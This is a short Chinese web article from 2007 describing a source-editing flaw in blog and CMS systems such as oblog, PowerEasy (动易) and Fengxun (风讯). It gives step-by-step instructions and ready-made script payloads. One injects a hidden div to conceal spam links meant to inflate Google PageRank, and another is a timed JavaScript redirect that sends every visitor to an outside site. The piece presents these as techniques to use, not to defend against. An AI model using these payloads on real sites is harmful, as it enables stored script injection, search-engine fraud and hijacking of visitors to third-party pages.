关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
更新时间:2007年01月16日 00:00:00 投稿:mdxy-dxy
这篇文章主要介绍了关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。
具体操作是:
1,进入"源码"编辑
2,输入阶段公分四段:
第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。
最新评论